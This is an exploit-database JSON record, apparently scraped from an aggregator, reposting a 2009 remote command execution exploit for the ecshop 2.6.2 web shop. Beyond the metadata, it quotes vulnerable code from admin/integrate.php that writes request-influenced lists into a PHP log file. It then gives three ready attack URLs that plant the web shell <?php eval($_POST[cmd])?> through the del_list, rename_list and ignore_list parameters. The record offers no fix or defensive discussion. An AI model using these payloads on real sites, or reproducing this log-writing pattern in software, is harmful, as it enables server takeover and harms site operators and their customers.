DATABASE RESOURCES PRICING ABOUT US

{"id": "1337DAY-ID-5273", "type": "zdt", "bulletinFamily": "exploit", "title": "ecshop 2.6.2 Multiple Remote Command Execution Vulnerabilities", "description": "Exploit for unknown platform in category web applications", "published": "2009-05-29T00:00:00", "modified": "2009-05-29T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/5273", "reporter": "0day Today Team", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-03-14T09:13:10", "viewCount": 11, "enchantments": {"score": {"value": 0.3, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.3}, "sourceHref": "https://0day.today/exploit/5273", "sourceData": "==============================================================\r\necshop 2.6.2 Multiple Remote Command Execution Vulnerabilities\r\n==============================================================\r\n\r\n\r\n1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 \r\n0 _ __ __ __ 1\r\n1 /' \\ __ /'__`\\ /\\ \\__ /'__`\\ 0\r\n0 /\\_, \\ ___ /\\_\\/\\_\\ \\ \\ ___\\ \\ ,_\\/\\ \\/\\ \\ _ ___ 1\r\n1 \\/_/\\ \\ /' _ `\\ \\/\\ \\/_/_\\_<_ /'___\\ \\ \\/\\ \\ \\ \\ \\/\\`'__\\ 0\r\n0 \\ \\ \\/\\ \\/\\ \\ \\ \\ \\/\\ \\ \\ \\/\\ \\__/\\ \\ \\_\\ \\ \\_\\ \\ \\ \\/ 1\r\n1 \\ \\_\\ \\_\\ \\_\\_\\ \\ \\ \\____/\\ \\____\\\\ \\__\\\\ \\____/\\ \\_\\ 0\r\n0 \\/_/\\/_/\\/_/\\ \\_\\ \\/___/ \\/____/ \\/__/ \\/___/ \\/_/ 1\r\n1 \\ \\____/ >> Exploit database separated by exploit 0\r\n0 \\/___/ type (local, remote, DoS, etc.) 1\r\n1 0\r\n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1\r\n\r\n\r\n#################################################################\r\n# Application Info:\r\n# Name: ecshop\r\n# Version: 2.6.2\r\n# Website: http://www.ecshop.com\r\n#################################################################\r\n#===========================================================\r\n# :: integrate.php ::\r\n#\r\n# if ($_REQUEST['act'] == 'sync')\r\n# {\r\n# $size = 100;\r\n# ......\r\n# $tasks = array();\r\n# if ($task_del > 0)\r\n# {\r\n# $tasks[] = array('task_name'=>sprintf($_LANG['task_del'], $task_del),'task_status'=>'<span id=\"task_del\">' . $_LANG['task_uncomplete'] . '<span>');\r\n# $sql = \"SELECT user_name FROM \" . $ecs->table('users') . \" WHERE flag = 2\";\r\n# $del_list = $db->getCol($sql);//$del_list\r\n# }\r\n# if ($task_rename > 0)\r\n# {\r\n# $tasks[] = array('task_name'=>sprintf($_LANG['task_rename'], $task_rename),'task_status'=>'<span id=\"task_rename\">' . $_LANG['task_uncomplete'] . '</span>');\r\n# $sql = \"SELECT user_name, alias FROM \" . $ecs->table('users') . \" WHERE flag = 3\";\r\n# $rename_list = $db->getAll($sql);//$rename_list\r\n# }\r\n# if ($task_ignore >0)\r\n# {\r\n# $sql = \"SELECT user_name FROM \" . $ecs->table('users') . \" WHERE flag = 4\";\r\n# $ignore_list = $db->getCol($sql);//$ignore_list\r\n# }\r\n# ....\r\n# $fp = @fopen(ROOT_PATH . DATA_DIR . '/integrate_' . $_SESSION['code'] . '_log.php', 'wb');\r\n# $log = '';\r\n# if (isset($del_list))\r\n# {\r\n# $log .= '$del_list=' . var_export($del_list,true) . ';';\r\n# }\r\n# if (isset($rename_list))\r\n# {\r\n# $log .= '$rename_list=' . var_export($rename_list, true) . ';';\r\n# }\r\n# if (isset($ignore_list))\r\n# {\r\n# $log .= '$ignore_list=' . var_export($ignore_list, true) . ';';\r\n# }\r\n# fwrite($fp, $log);\r\n# fclose($fp);\r\n# $smarty->assign('tasks', $tasks);\r\n# $smarty->assign('ur_here',$_LANG['user_sync']);\r\n# $smarty->assign('size', $size);\r\n# $smarty->display('integrates_sync.htm');\r\n# }\r\n#\r\n#\r\n# http://site.com/admin/integrate.php?act=sync&del_list=<?php%20eval($_POST[cmd])?>\r\n# http://site.com/admin/integrate.php?act=sync&rename_list=<?php%20eval($_POST[cmd])?>\r\n# http://site.com/admin/integrate.php?act=sync&ignore_list=<?php%20eval($_POST[cmd])?>\r\n#===========================================================\r\n#################################################################\r\n\r\n\r\n\n# 0day.today [2018-03-14] #", "_state": {"dependencies": 1647757265, "score": 1659766679, "epss": 1678812679}}

{}